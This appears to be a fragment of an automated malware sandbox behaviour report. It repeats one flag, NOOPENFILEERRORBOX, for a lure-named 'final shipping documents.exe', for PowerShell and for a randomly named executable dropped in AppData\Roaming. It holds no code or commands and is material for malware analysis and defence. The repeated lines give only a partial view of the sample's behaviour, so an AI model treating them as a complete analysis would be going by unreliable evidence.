Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
